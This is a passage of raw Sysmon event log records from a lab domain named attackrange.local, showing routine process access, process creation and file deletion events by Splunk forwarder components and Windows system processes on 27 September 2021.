Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B664BF772F506F995D485153C1FA796,SHA256=558C69310B83B830663180F9C8DA018318A97A63BCF4F911A2A98270D19120E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.341{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D95-6151-B300-00000000FD01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.341{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.341{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.341{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056664Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.341{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.341{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8D95-6151-B300-00000000FD01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.341{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D95-6151-B300-00000000FD01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:33.342{5EBD8912-8D95-6151-B300-00000000FD01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981254Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:34.777{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BBB1F89AFFCC861703CA8CD2B6DB4A7,SHA256=E74CDE6829957120C890D62B4EC005B18A4D97F9C760919152010F9F02121DB2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.919{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D96-6151-B500-00000000FD01}5232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.919{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.919{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.919{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.919{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.919{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D96-6151-B500-00000000FD01}5232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.919{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D96-6151-B500-00000000FD01}5232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.920{5EBD8912-8D96-6151-B500-00000000FD01}5232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.497{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14B6A9870278FC1A7B6E5C867BE1BD45,SHA256=032E17F15E9F4DD2F3BFAC7CF2B4464913F6FD54F351A424380EAB8926E1EA43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.482{5EBD8912-8D96-6151-B400-00000000FD01}49124400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.404{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=136695EE2984A065E16A87C608EA9ACB,SHA256=BF89FF8E5929624C874A55E35C76E6EA7E158D5C89F5401052D23388497842CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056678Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.247{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D96-6151-B400-00000000FD01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056677Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.247{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056676Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.247{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056675Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.247{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056674Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.247{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.247{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D96-6151-B400-00000000FD01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.247{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D96-6151-B400-00000000FD01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.248{5EBD8912-8D96-6151-B400-00000000FD01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981258Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:35.777{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70E6C7C482C8C3FD7458DD9D3EEAF6AD,SHA256=BDDA96ECC257C30035BD81CF5C3B11ECCB5ABE6DD9E7627F560C6270603FEB2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:35.935{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2822E3168FD701C62B6D724C854A3FE1,SHA256=01419982B5579C477D8767089FC6FE27732E65871FD4983056988FD2942B1628,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:35.451{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 